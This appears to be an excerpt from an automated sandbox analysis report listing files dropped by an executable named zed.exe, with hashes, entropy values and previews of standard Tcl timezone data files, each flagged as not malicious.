                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):248
                                                                                                                                                                                                                                            Entropy (8bit):4.673559445766137
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2905R3SDm2OHRLx5oH8ZOXFxSyZ1yV/KMMdVVFAKFZ4KVR/ON:MB86290LGmdHBnC8ZODhyV/4d/OeZ4Ke
                                                                                                                                                                                                                                            MD5:F06C226D8D53EF8859AD91D7EBA5959C
                                                                                                                                                                                                                                            SHA1:E0B4E6F4ADCB10F1D79FFD928E8684FFE0C0DC5F
                                                                                                                                                                                                                                            SHA-256:4078D2E361D04A66F22F652E3810CDF7F630CF89399B47E4EC7B1D32B400FD85
                                                                                                                                                                                                                                            SHA-512:B4385650A0C69B7BD66415CC4BB9FCA854DBB1427E9F2D6C1D8CDB8CCEF9ECBD699C66A83A9AC289DABC5CDBB0A2B044E4097E9A2977AE1802B3BF6E2BB518CF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guyana) {.. {-9223372036854775808 -13959 0 LMT}.. {-1843589241 -14400 0 -04}.. {-1730577600 -13500 0 -0345}.. {176096700 -10800 0 -03}.. {701841600 -14400 0 -04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11124
                                                                                                                                                                                                                                            Entropy (8bit):3.8106487461849885
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:YpQamC9XD81iWQSufutTLBCN8RWnWQ7Z/xVpmtBwXiCDLxcGMe++wzlrfFj10Kvn:2kXCvNc/1/CC
                                                                                                                                                                                                                                            MD5:6FB9E47841FF397CE36A36C8280E2089
                                                                                                                                                                                                                                            SHA1:DA210300DC3D94FC3D8BA0A4531341BCA5C5936C
                                                                                                                                                                                                                                            SHA-256:01E11C7B07925D05E9E1876C310A2B87E0E80EF115D062225212E472B7A964F1
                                                                                                                                                                                                                                            SHA-512:F61B5A8A7532BBD54A4976DF17A1C6CF51BCC6DC396482FBE169C3081AF27B6CA863F0CDE3E483C59F5A5BD3365592F6984A97173C736B41D3CEEDAD4263A4E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Halifax) {.. {-9223372036854775808 -15264 0 LMT}.. {-2131645536 -14400 0 AST}.. {-1696276800 -10800 1 ADT}.. {-1680469200 -14400 0 AST}.. {-1640980800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1609444800 -14400 0 AST}.. {-1566763200 -10800 1 ADT}.. {-1557090000 -14400 0 AST}.. {-1535486400 -10800 1 ADT}.. {-1524949200 -14400 0 AST}.. {-1504468800 -10800 1 ADT}.. {-1493413200 -14400 0 AST}.. {-1472414400 -10800 1 ADT}.. {-1461963600 -14400 0 AST}.. {-1440964800 -10800 1 ADT}.. {-1429390800 -14400 0 AST}.. {-1409515200 -10800 1 ADT}.. {-1396731600 -14400 0 AST}.. {-1376856000 -10800 1 ADT}.. {-1366491600 -14400 0 AST}.. {-1346616000 -10800 1 ADT}.. {-1333832400 -14400 0 AST}.. {-1313956800 -10800 1 ADT}.. {-1303678800 -14400 0 AST}.. {-1282507200 -10800 1 ADT}.. {-1272661200 -14400 0 AST}.. {-1251057600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8729
                                                                                                                                                                                                                                            Entropy (8bit):3.8227313494100867
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:BEsWduCtQA/gF6Y3Umjm67yLb5RCzhV28I:BBWACb/gF6Y3UmjBy7
                                                                                                                                                                                                                                            MD5:564980AECB32F5778422EA15E8956879
                                                                                                                                                                                                                                            SHA1:545209C95043721C1839CCE5FEFD1A6F2DE3FE5F
                                                                                                                                                                                                                                            SHA-256:96B62BFBF0C05CF970245597C691F89EBF631175796459642A85287F131D0215
                                                                                                                                                                                                                                            SHA-512:25FE5DAA55E3466EAE1CDC73918F189403C3360D4E82D72D745FA04A374DE04F479AA9811D6154FC70CC8EA620F18035EA6A3074116806D4405936FA017CE8E6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Havana) {.. {-9223372036854775808 -19768 0 LMT}.. {-2524501832 -19776 0 HMT}.. {-1402813824 -18000 0 CST}.. {-1311534000 -14400 1 CDT}.. {-1300996800 -18000 0 CST}.. {-933534000 -14400 1 CDT}.. {-925675200 -18000 0 CST}.. {-902084400 -14400 1 CDT}.. {-893620800 -18000 0 CST}.. {-870030000 -14400 1 CDT}.. {-862171200 -18000 0 CST}.. {-775681200 -14400 1 CDT}.. {-767822400 -18000 0 CST}.. {-744231600 -14400 1 CDT}.. {-736372800 -18000 0 CST}.. {-144702000 -14400 1 CDT}.. {-134251200 -18000 0 CST}.. {-113425200 -14400 1 CDT}.. {-102542400 -18000 0 CST}.. {-86295600 -14400 1 CDT}.. {-72907200 -18000 0 CST}.. {-54154800 -14400 1 CDT}.. {-41457600 -18000 0 CST}.. {-21495600 -14400 1 CDT}.. {-5774400 -18000 0 CST}.. {9954000 -14400 1 CDT}.. {25675200 -18000 0 CST}.. {41403600 -14400 1 CDT}.. {57729600 -18000 0 CST}.. {73458000 -14400 1 CD
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):616
                                                                                                                                                                                                                                            Entropy (8bit):4.351214377567366
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290e2mdH5NCtXwl3UXmMMmxL+voudQCvX70qKOV9kYNv:5Ie5k9WUQwuz/Vyu
                                                                                                                                                                                                                                            MD5:E35A6C6E9DCF0CA34BFA2993CE445D6C
                                                                                                                                                                                                                                            SHA1:4FF9C7EDBC73B1AE0815661571B7199379AF479C
                                                                                                                                                                                                                                            SHA-256:C0A87DC3A474D25083F0CEA0C323D8E780D937453CAD23C98AF367D81AC2CA2D
                                                                                                                                                                                                                                            SHA-512:56A728ABCD3EA91D2492E1331B3F76F31EF5675BCD95A692F9D94F91518B72569FD8DF1BB0515668E8A9BE0347018B391C65761D316903CA27C59883BBE0DE80
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Hermosillo) {.. {-9223372036854775808 -26632 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {915174000 -25200 0 MST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7230
                                                                                                                                                                                                                                            Entropy (8bit):3.882344472808608
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:nys0KHK1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:nyBKHkN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:7824B3F2D20F16A9DCC8E0F7DC45C1B8
                                                                                                                                                                                                                                            SHA1:77014A0502DA1342EFA41B64C5613839B627354B
                                                                                                                                                                                                                                            SHA-256:4B114545167326F066AB3A798180896B43AC6FDC3B80D32BCC917B5A4A2359EB
                                                                                                                                                                                                                                            SHA-512:03F6A18C03E79E9177D16CD7AB75AC117197638370FA675BC2854A5A563021F865F3F0672B237B83098787AB9D419AC33D67F28324B1E25AD8560B5838F70807
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Indianapolis) {.. {-9223372036854775808 -20678 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-900259200 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8755
                                                                                                                                                                                                                                            Entropy (8bit):3.8394539560522585
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:+q2KeNrdJ8SvAgahLi8hDlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:+FKUdJ8SvPaUqbA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:8AF080A022DA0737E94742C50EAAC62E
                                                                                                                                                                                                                                            SHA1:704F0565B53AA8A20F70B79A7958D4D07085E07A
                                                                                                                                                                                                                                            SHA-256:F1253F5F3F5AACD1A5E1F4636DD4E083F4B2A8BD995CF3E684CDD384641849F1
                                                                                                                                                                                                                                            SHA-512:26AAF6D24B2E2B60451E19A514533DFAEC74F01F9B1AEB9F86690669C14130D77AE1CBFB9FC9091E1CD1FC1CBC2799BB05026DB68768C3CCB960355C18D111ED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Knox) {.. {-9223372036854775808 -20790 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-725824800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.. {-447267600 -21600 0 CST}.. {-431539200 -18000 1 CDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7273
                                                                                                                                                                                                                                            Entropy (8bit):3.8700915866109535
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:7qvrv7+X1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:7Kv7+bN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:C1A10440E6CCE4C5052E2510182D9AA7
                                                                                                                                                                                                                                            SHA1:56D4F3CCA1245D626BADA74CF3F6BAE8034BF58D
                                                                                                                                                                                                                                            SHA-256:675162381639598E7100E90663D42780F8EE1CB62BD6DA5B948B494F98C02FE3
                                                                                                                                                                                                                                            SHA-512:96B71472AD38ECFC589F935D9F5F1C8D42C8E942D8772FB6A77F9B9C0E2BD7A07FA61729E57EC02356121518E33797A784679F8DED2FCA3FC79F5C114783DD57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Marengo) {.. {-9223372036854775808 -20723 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-599594400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {-21488400 -14400 1 EDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7611
                                                                                                                                                                                                                                            Entropy (8bit):3.87971256165061
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:TqervJ8SUklggahyBRP0HY2iU7KKdFL6Aa2K4gSLf8e:TpvJ8SUklvaQN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:A86042668CD478AFFC05D3383EDEE8FF
                                                                                                                                                                                                                                            SHA1:6476526F94A247C0ECF3B2813F2C5A4FB93E457E
                                                                                                                                                                                                                                            SHA-256:23B8FA75CE0A9555DFD84549723A12679FF7FC5FAA58E4B745BA3C547071FF53
                                                                                                                                                                                                                                            SHA-512:07A5487A087108E6D6E88580865885CA6243EF04BE8263FC913F38CADB8EA016386E8BBAD39F65FD081F1A2F14316FEAF008855E9CF2019B169D9511916AFF67
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Petersburg) {.. {-9223372036854775808 -20947 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-473364000 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 1 CDT}.. {-257965200 -21600 0 CST}.. {-242236800 -18000 1 CDT}.. {-226515600 -21600 0 CST}.. {-210787200 -18000 1 CDT}.. {-195066000 -21600 0 CST}.. {-179337600 -18000 1 CD
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7100
                                                                                                                                                                                                                                            Entropy (8bit):3.8613085681914607
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:yqxrvJ8SUklLgzNA604qSScBgN+4ctDzIVQ/c/3hNxTh:yUvJ8SUkl8BA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:E7FE9B7CFBC6505C446056967DEBC87B
                                                                                                                                                                                                                                            SHA1:81ADAD89F040F62E87D2F26D1D98B3E52710F695
                                                                                                                                                                                                                                            SHA-256:D368123DB703B55244700876906775837D408C274C5A5801D80B77EADB6D5853
                                                                                                                                                                                                                                            SHA-512:9C0746DE18C80B548AA443D59BB9971BDC304975717C5FCDEBDE72828ACF408FA1D687F87C42E7B8D6D0284C9F792EA236BF79C815947BE773D07364B630AC99
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Tell_City) {.. {-9223372036854775808 -20823 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 1 CDT}.. {-257965200 -21600 0 CST}.. {-242236800 -18000 1 CDT}.. {-226515600 -21600 0 CST}.. {-210787200 -18000 1 CDT}.. {-195066000 -21600 0 CST}.. {-179337600 -18000 0 EST
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6563
                                                                                                                                                                                                                                            Entropy (8bit):3.866646181493734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:juqv01BRP0HY2iU7KKdFL6Aa2K4gSLf8e:CoKN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:2CCFC3980C321ED8A852759C0BCCB12C
                                                                                                                                                                                                                                            SHA1:A8BFE02E4E71B28EF8E284E808F6EDE7C231F8FF
                                                                                                                                                                                                                                            SHA-256:0623233AA39A1A82038A56DF255ADF49E648777375B8499491C8897EBEA1CDF1
                                                                                                                                                                                                                                            SHA-512:A4C77689BC9BF871C756D05BAC4157F0FD324D10AC7D15F3543344C6F8C7FC9218AB7ADFBCE70C8ECCDD6EC15FD7960503FC7A8223FECE6D4227BF0BB04190C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Vevay) {.. {-9223372036854775808 -20416 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-495043200 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {-21488400 -14400 1 EDT}.. {-5767200 -18000 0 EST}.. {9961200 -14400 1 EDT}.. {25682400 -18000 0 EST}.. {41410800 -14400 1 EDT}.. {57736800 -18000 0 EST}.. {73465200 -14400 1 EDT}.. {89186400 -18000 0 EST}.. {94712400 -18000 0 EST}.. {1136091600 -18000 0 EST}.. {1143961200 -14400 1 EDT}.. {1162101600 -18000 0 EST}.. {1173596400 -14400 1 EDT}.. {1194156000 -18000 0 EST}.. {1205046000 -14400 1 EDT}.. {1225605600 -18000 0 EST}.. {1236495600 -14400 1 EDT}.. {1257055200 -18000 0 EST}.. {1268550000 -144
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7226
                                                                                                                                                                                                                                            Entropy (8bit):3.879195938909716
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Vq8rdJ5UklpRBRP0HY2iU7KKdFL6Aa2K4gSLf8e:VbdJ5Uklp/N0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:56D1930F5FAE2456DEC6C9AB1B0233E1
                                                                                                                                                                                                                                            SHA1:F6ED52EF769DF2C015C181BCFF3DC0E24497C768
                                                                                                                                                                                                                                            SHA-256:B8452B6AA739A78AC6D03806463B03D4175639593E19FAA3CA4B0D0FB77F18C9
                                                                                                                                                                                                                                            SHA-512:AFCFF383DB441DA9154B639A88700D0604F487A20E830146B14061E485A991AD8DC279AF8C0C2329265CF14C901207B9058157FAA1C039082EB7630916834156
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Vincennes) {.. {-9223372036854775808 -21007 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-289414800 -21600 0 CST}.. {-273686400 -18000 1 CDT
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7410
                                                                                                                                                                                                                                            Entropy (8bit):3.8775722319777968
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:uq0KeKrv7c1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:unKxv7yN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:880526DC23E7BDB00506D7EC2A885907
                                                                                                                                                                                                                                            SHA1:DB3B13A2A4BF80E7B71C7F0604A0A80EF070B9BA
                                                                                                                                                                                                                                            SHA-256:4B293FDB7680C4597B8C885333719214492ECF09BD5EA342D1EC15F2BF9C8605
                                                                                                                                                                                                                                            SHA-512:42EEDC5EA28781D62A457F4843F38D0A3FEFCAD83BA01B07CEF0FA169C6440960E04BABD272C5E9AF2F4B0DBB2A786EF9221A48F084F16752E6D0EA66C31911E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Winamac) {.. {-9223372036854775808 -20785 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):233
                                                                                                                                                                                                                                            Entropy (8bit):4.7047837427916095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/2903GfJ4903GK8:MByMY3GK7Kp3GKnt2903GfJ4903GK8
                                                                                                                                                                                                                                            MD5:DEE404D54FD707C4A27F464B5F19D135
                                                                                                                                                                                                                                            SHA1:AD95D04738F6B15A93DED1DE6B5FA9F47C8E38CB
                                                                                                                                                                                                                                            SHA-256:437DA148B94DBA4CEA402169878541DB9C3419ABAB6750D1C36625DD3053019E
                                                                                                                                                                                                                                            SHA-512:421D6AF30F0C64EA6CB9F9DC4E7EF9E8EE5945F81A5E82A6D959D32AD69F325770DB6A07D8F52EFE7EE7F6C3AD4E1F34AA30A6B5E006C928119A54E746D6FE6B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Indianapolis) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7638
                                                                                                                                                                                                                                            Entropy (8bit):3.8629745113156004
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/nGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/GPlLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:DBF9C2CCF786A593C9D6E4F4BB37ACE9
                                                                                                                                                                                                                                            SHA1:4D2332A530A36E6DB2802DD9FA2DAF5C0594D5EA
                                                                                                                                                                                                                                            SHA-256:5A1F7F5EDAD0251B73C33E7B5DDEE194646E9D3992B169DC1A64D155765D472C
                                                                                                                                                                                                                                            SHA-512:70D75371497CED3B6C731C95299CDD5F8F49C3C6EEDDF31EB05D008769D76ACFE8BFA9A2ECE45BD0BA2E279BBEF65945955791EFC04A569F5CAA13665CD2545F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Inuvik) {.. {-9223372036854775808 0 0 -00}.. {-536457600 -28800 0 PST}.. {-147888000 -21600 1 PDDT}.. {-131558400 -28800 0 PST}.. {315558000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}.. {688550400 -25200 0 MST}.. {702464400 -21600 1 MDT}.. {7200000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7671
                                                                                                                                                                                                                                            Entropy (8bit):3.832645570123566
                                                                                                                                                                                                                                            Encrypted:false
